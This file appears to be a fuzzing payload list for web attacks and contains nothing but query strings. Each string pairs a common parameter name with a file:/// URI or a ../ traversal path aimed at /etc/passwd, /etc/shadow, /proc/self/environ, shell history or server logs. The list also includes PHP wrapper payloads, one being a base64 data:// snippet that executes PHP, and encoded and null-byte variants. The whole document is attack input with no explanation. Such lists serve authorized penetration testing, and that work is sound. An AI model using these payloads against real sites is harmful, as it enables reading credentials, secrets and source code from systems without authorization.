?redirect=file:///etc/passwd
?redirect=file:///etc/shadow
?redirect=file:///var/www/html/index.php
?redirect=file:///proc/self/environ
?redirect=file:///proc/self/status
?redirect=file:///var/log/auth.log
?redirect=file:///etc/hostname
?redirect=file:///etc/network/interfaces
?redirect=file:///tmp/shell.php
?redirect=file:///home/user/.bash_history
?redirect=file:///var/log/apache2/access.log
?redirect=file:///var/log/apache2/error.log
?redirect=file:///etc/ssl/certs/ca-certificates.crt
?returnUrl=file:///etc/passwd
?returnUrl=file:///etc/shadow
?returnUrl=file:///var/www/html/index.php
?returnUrl=file:///proc/self/environ
?returnUrl=file:///proc/self/status
?returnUrl=file:///var/log/auth.log
?returnUrl=file:///etc/hostname
?returnUrl=file:///etc/network/interfaces
?returnUrl=file:///tmp/shell.php
?returnUrl=file:///home/user/.bash_history
?returnUrl=file:///var/log/apache2/access.log
?returnUrl=file:///var/log/apache2/error.log
?returnUrl=file:///etc/ssl/certs/ca-certificates.crt
?next=file:///etc/passwd
?next=file:///etc/shadow
?next=file:///var/www/html/index.php
?next=file:///proc/self/environ
?next=file:///proc/self/status
?next=file:///var/log/auth.log
?next=file:///etc/hostname
?next=file:///etc/network/interfaces
?next=file:///tmp/shell.php
?next=file:///home/user/.bash_history
?next=file:///var/log/apache2/access.log
?next=file:///var/log/apache2/error.log
?next=file:///etc/ssl/certs/ca-certificates.crt
?url=file:///etc/passwd
?url=file:///etc/shadow
?url=file:///var/www/html/index.php
?url=file:///proc/self/environ
?url=file:///proc/self/status
?url=file:///var/log/auth.log
?url=file:///etc/hostname
?url=file:///etc/network/interfaces
?url=file:///tmp/shell.php
?url=file:///home/user/.bash_history
?url=file:///var/log/apache2/access.log
?url=file:///var/log/apache2/error.log
?url=file:///etc/ssl/certs/ca-certificates.crt
?target=file:///etc/passwd
?target=file:///etc/shadow
?target=file:///var/www/html/index.php
?target=file:///proc/self/environ
?target=file:///proc/self/status
?target=file:///var/log/auth.log
?target=file:///etc/hostname
?target=file:///etc/network/interfaces
?target=file:///tmp/shell.php
?target=file:///home/user/.bash_history
?target=file:///var/log/apache2/access.log
?target=file:///var/log/apache2/error.log
?target=file:///etc/ssl/certs/ca-certificates.crt
?dest=file:///etc/passwd
?dest=file:///etc/shadow
?dest=file:///var/www/html/index.php
?dest=file:///proc/self/environ
?dest=file:///proc/self/status
?dest=file:///var/log/auth.log
?dest=file:///etc/hostname
?dest=file:///etc/network/interfaces
?dest=file:///tmp/shell.php
?dest=file:///home/user/.bash_history
?dest=file:///var/log/apache2/access.log
?dest=file:///var/log/apache2/error.log
?dest=file:///etc/ssl/certs/ca-certificates.crt
?destination=file:///etc/passwd
?destination=file:///etc/shadow
?destination=file:///var/www/html/index.php
?destination=file:///proc/self/environ
?destination=file:///proc/self/status
?destination=file:///var/log/auth.log
?destination=file:///etc/hostname
?destination=file:///etc/network/interfaces
?destination=file:///tmp/shell.php
?destination=file:///home/user/.bash_history
?destination=file:///var/log/apache2/access.log
?destination=file:///var/log/apache2/error.log
?destination=file:///etc/ssl/certs/ca-certificates.crt
?redir=file:///etc/passwd
?redir=file:///etc/shadow
?redir=file:///var/www/html/index.php
?redir=file:///proc/self/environ
?redir=file:///proc/self/status
?redir=file:///var/log/auth.log
?redir=file:///etc/hostname
?redir=file:///etc/network/interfaces
?redir=file:///tmp/shell.php
?redir=file:///home/user/.bash_history
?redir=file:///var/log/apache2/access.log
?redir=file:///var/log/apache2/error.log
?redir=file:///etc/ssl/certs/ca-certificates.crt
?goto=file:///etc/passwd
?goto=file:///etc/shadow
?goto=file:///var/www/html/index.php
?goto=file:///proc/self/environ
?goto=file:///proc/self/status
?goto=file:///var/log/auth.log
?goto=file:///etc/hostname
?goto=file:///etc/network/interfaces
?goto=file:///tmp/shell.php
?goto=file:///home/user/.bash_history
?goto=file:///var/log/apache2/access.log
?goto=file:///var/log/apache2/error.log
?goto=file:///etc/ssl/certs/ca-certificates.crt
?out=file:///etc/passwd
?out=file:///etc/shadow
?out=file:///var/www/html/index.php
?out=file:///proc/self/environ
?out=file:///proc/self/status
?out=file:///var/log/auth.log
?out=file:///etc/hostname
?out=file:///etc/network/interfaces
?out=file:///tmp/shell.php
?out=file:///home/user/.bash_history
?out=file:///var/log/apache2/access.log
?out=file:///var/log/apache2/error.log
?out=file:///etc/ssl/certs/ca-certificates.crt
?view=file:///etc/passwd
?view=file:///etc/shadow
?view=file:///var/www/html/index.php
?view=file:///proc/self/environ
?view=file:///proc/self/status
?view=file:///var/log/auth.log
?view=file:///etc/hostname
?view=file:///etc/network/interfaces
?view=file:///tmp/shell.php
?view=file:///home/user/.bash_history
?view=file:///var/log/apache2/access.log
?view=file:///var/log/apache2/error.log
?view=file:///etc/ssl/certs/ca-certificates.crt
?continue=file:///etc/passwd
?continue=file:///etc/shadow
?continue=file:///var/www/html/index.php
?continue=file:///proc/self/environ
?continue=file:///proc/self/status
?continue=file:///var/log/auth.log
?continue=file:///etc/hostname
?continue=file:///etc/network/interfaces
?continue=file:///tmp/shell.php
?continue=file:///home/user/.bash_history
?continue=file:///var/log/apache2/access.log
?continue=file:///var/log/apache2/error.log
?continue=file:///etc/ssl/certs/ca-certificates.crt
?file=file:///etc/passwd
?file=file:///etc/shadow
?file=file:///var/www/html/index.php
?file=file:///proc/self/environ
?file=file:///proc/self/status
?file=file:///var/log/auth.log
?file=file:///etc/hostname
?file=file:///etc/network/interfaces
?file=file:///tmp/shell.php
?page=file:///etc/passwd
?page=file:///etc/shadow
?page=file:///var/www/html/index.php
?page=file:///proc/self/environ
?page=file:///proc/self/status
?page=file:///var/log/auth.log
?page=file:///etc/hostname
?page=file:///etc/network/interfaces
?page=file:///tmp/shell.php
?page=../../../../../../etc/passwd
?page=..%2f..%2f..%2f..%2fetc%2fpasswd
?page=....//....//....//....//etc/passwd
?page=php://filter/convert.base64-encode/resource=index.php
?page=php://input
?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
?page=../../../../var/log/apache2/access.log
?page=../../../../var/log/nginx/access.log
?page=../../../../var/log/auth.log
?page=../../../../etc/passwd%00
?file=../../../../etc/passwd%00
?file=../../../../etc/passwd
?template=../../../../etc/passwd
?include=../../../../etc/passwd
?path=../../../../etc/passwd
?doc=../../../../etc/passwd
?template=file:///etc/passwd
?template=file:///etc/shadow
?template=file:///var/www/html/index.php
?template=file:///proc/self/environ
?template=file:///proc/self/status
?template=file:///var/log/auth.log
?template=file:///etc/hostname
?template=file:///etc/network/interfaces
?template=file:///tmp/shell.php
?lang=file:///etc/passwd
?lang=file:///etc/shadow
?lang=file:///var/www/html/index.php
?lang=file:///proc/self/environ
?lang=file:///proc/self/status
?lang=file:///var/log/auth.log
?lang=file:///etc/hostname
?lang=file:///etc/network/interfaces
?lang=file:///tmp/shell.php
?module=file:///etc/passwd
?module=file:///etc/shadow
?module=file:///var/www/html/index.php
?module=file:///proc/self/environ
?module=file:///proc/self/status
?module=file:///var/log/auth.log
?module=file:///etc/hostname
?module=file:///etc/network/interfaces
?module=file:///tmp/shell.php
?load=file:///etc/passwd
?load=file:///etc/shadow
?load=file:///var/www/html/index.php
?load=file:///proc/self/environ
?load=file:///proc/self/status
?load=file:///var/log/auth.log
?load=file:///etc/hostname
?load=file:///etc/network/interfaces
?load=file:///tmp/shell.php
?include=file:///etc/passwd
?include=file:///etc/shadow
?include=file:///var/www/html/index.php
?include=file:///proc/self/environ
?include=file:///proc/self/status
?include=file:///var/log/auth.log
?include=file:///etc/hostname
?include=file:///etc/network/interfaces
?include=file:///tmp/shell.php
?redirect=../../../../../../etc/passwd
?redirect=../../../../../../etc/shadow
?redirect=../../../../../../var/www/html/index.php
?redirect=../../../../../../proc/self/environ
?redirect=../../../../../../proc/self/status
?redirect=../../../../../../var/log/auth.log
?redirect=../../../../../../etc/hostname
?redirect=../../../../../../etc/network/interfaces
?redirect=../../../../../../tmp/shell.php
?redirect=../../../../../../home/user/.bash_history
?redirect=../../../../../../var/log/apache2/access.log
?redirect=../../../../../../var/log/apache2/error.log
?redirect=../../../../../../etc/ssl/certs/ca-certificates.crt
?returnUrl=../../../../../../etc/passwd
?returnUrl=../../../../../../etc/shadow
?returnUrl=../../../../../../var/www/html/index.php
?returnUrl=../../../../../../proc/self/environ
?returnUrl=../../../../../../proc/self/status
?returnUrl=../../../../../../var/log/auth.log
?returnUrl=../../../../../../etc/hostname
?returnUrl=../../../../../../etc/network/interfaces
?returnUrl=../../../../../../tmp/shell.php
?returnUrl=../../../../../../home/user/.bash_history
?returnUrl=../../../../../../var/log/apache2/access.log
?returnUrl=../../../../../../var/log/apache2/error.log
?returnUrl=../../../../../../etc/ssl/certs/ca-certificates.crt
?next=../../../../../../etc/passwd
?next=../../../../../../etc/shadow
?next=../../../../../../var/www/html/index.php
?next=../../../../../../proc/self/environ
?next=../../../../../../proc/self/status
?next=../../../../../../var/log/auth.log
?next=../../../../../../etc/hostname
?next=../../../../../../etc/network/interfaces
?next=../../../../../../tmp/shell.php
?next=../../../../../../home/user/.bash_history
?next=../../../../../../var/log/apache2/access.log
?next=../../../../../../var/log/apache2/error.log
?next=../../../../../../etc/ssl/certs/ca-certificates.crt
?url=../../../../../../etc/passwd
?url=../../../../../../etc/shadow
?url=../../../../../../var/www/html/index.php
?url=../../../../../../proc/self/environ
?url=../../../../../../proc/self/status
?url=../../../../../../var/log/auth.log
?url=../../../../../../etc/hostname
?url=../../../../../../etc/network/interfaces
?url=../../../../../../tmp/shell.php
?url=../../../../../../home/user/.bash_history
?url=../../../../../../var/log/apache2/access.log
?url=../../../../../../var/log/apache2/error.log
?url=../../../../../../etc/ssl/certs/ca-certificates.crt
?target=../../../../../../etc/passwd
?target=../../../../../../etc/shadow
?target=../../../../../../var/www/html/index.php
?target=../../../../../../proc/self/environ
?target=../../../../../../proc/self/status
?target=../../../../../../var/log/auth.log
?target=../../../../../../etc/hostname
?target=../../../../../../etc/network/interfaces
?target=../../../../../../tmp/shell.php
?target=../../../../../../home/user/.bash_history
?target=../../../../../../var/log/apache2/access.log
?target=../../../../../../var/log/apache2/error.log
?target=../../../../../../etc/ssl/certs/ca-certificates.crt
?dest=../../../../../../etc/passwd
?dest=../../../../../../etc/shadow
?dest=../../../../../../var/www/html/index.php
?dest=../../../../../../proc/self/environ
?dest=../../../../../../proc/self/status
?dest=../../../../../../var/log/auth.log
?dest=../../../../../../etc/hostname
?dest=../../../../../../etc/network/interfaces
?dest=../../../../../../tmp/shell.php
?dest=../../../../../../home/user/.bash_history
?dest=../../../../../../var/log/apache2/access.log
?dest=../../../../../../var/log/apache2/error.log
?dest=../../../../../../etc/ssl/certs/ca-certificates.crt
?destination=../../../../../../etc/passwd
?destination=../../../../../../etc/shadow
?destination=../../../../../../var/www/html/index.php
?destination=../../../../../../proc/self/environ
?destination=../../../../../../proc/self/status
?destination=../../../../../../var/log/auth.log
?destination=../../../../../../etc/hostname
?destination=../../../../../../etc/network/interfaces
?destination=../../../../../../tmp/shell.php
?destination=../../../../../../home/user/.bash_history
?destination=../../../../../../var/log/apache2/access.log
?destination=../../../../../../var/log/apache2/error.log
?destination=../../../../../../etc/ssl/certs/ca-certificates.crt
?redir=../../../../../../etc/passwd
?redir=../../../../../../etc/shadow
?redir=../../../../../../var/www/html/index.php
?redir=../../../../../../proc/self/environ
?redir=../../../../../../proc/self/status
?redir=../../../../../../var/log/auth.log
?redir=../../../../../../etc/hostname
?redir=../../../../../../etc/network/interfaces
?redir=../../../../../../tmp/shell.php
?redir=../../../../../../home/user/.bash_history
?redir=../../../../../../var/log/apache2/access.log
?redir=../../../../../../var/log/apache2/error.log
?redir=../../../../../../etc/ssl/certs/ca-certificates.crt
?goto=../../../../../../etc/passwd
?goto=../../../../../../etc/shadow
?goto=../../../../../../var/www/html/index.php
?goto=../../../../../../proc/self/environ
?goto=../../../../../../proc/self/status
?goto=../../../../../../var/log/auth.log
?goto=../../../../../../etc/hostname
?goto=../../../../../../etc/network/interfaces
?goto=../../../../../../tmp/shell.php
?goto=../../../../../../home/user/.bash_history
?goto=../../../../../../var/log/apache2/access.log
?goto=../../../../../../var/log/apache2/error.log
?goto=../../../../../../etc/ssl/certs/ca-certificates.crt
?out=../../../../../../etc/passwd
?out=../../../../../../etc/shadow
?out=../../../../../../var/www/html/index.php
?out=../../../../../../proc/self/environ
?out=../../../../../../proc/self/status
?out=../../../../../../var/log/auth.log
?out=../../../../../../etc/hostname
?out=../../../../../../etc/network/interfaces
?out=../../../../../../tmp/shell.php
?out=../../../../../../home/user/.bash_history
?out=../../../../../../var/log/apache2/access.log
?out=../../../../../../var/log/apache2/error.log
?out=../../../../../../etc/ssl/certs/ca-certificates.crt
?view=../../../../../../etc/passwd
?view=../../../../../../etc/shadow
?view=../../../../../../var/www/html/index.php
?view=../../../../../../proc/self/environ
?view=../../../../../../proc/self/status
?view=../../../../../../var/log/auth.log
?view=../../../../../../etc/hostname
?view=../../../../../../etc/network/interfaces
?view=../../../../../../tmp/shell.php
?view=../../../../../../home/user/.bash_history
?view=../../../../../../var/log/apache2/access.log
?view=../../../../../../var/log/apache2/error.log
?view=../../../../../../etc/ssl/certs/ca-certificates.crt
?continue=../../../../../../etc/passwd
?continue=../../../../../../etc/shadow
?continue=../../../../../../var/www/html/index.php
?continue=../../../../../../proc/self/environ
?continue=../../../../../../proc/self/status
?continue=../../../../../../var/log/auth.log
?continue=../../../../../../etc/hostname
?continue=../../../../../../etc/network/interfaces
?continue=../../../../../../tmp/shell.php
?continue=../../../../../../home/user/.bash_history
?continue=../../../../../../var/log/apache2/access.log
?continue=../../../../../../var/log/apache2/error.log
?continue=../../../../../../etc/ssl/certs/ca-certificates.crt
?file=../../../../../../etc/passwd
?file=../../../../../../etc/shadow
?file=../../../../../../var/www/html/index.php
?file=../../../../../../proc/self/environ
?file=../../../../../../proc/self/status
?file=../../../../../../var/log/auth.log
?file=../../../../../../etc/hostname
?file=../../../../../../etc/network/interfaces
?file=../../../../../../tmp/shell.php
?file=../../../../../../home/user/.bash_history
?file=../../../../../../var/log/apache2/access.log
?file=../../../../../../var/log/apache2/error.log
?file=../../../../../../etc/ssl/certs/ca-certificates.crt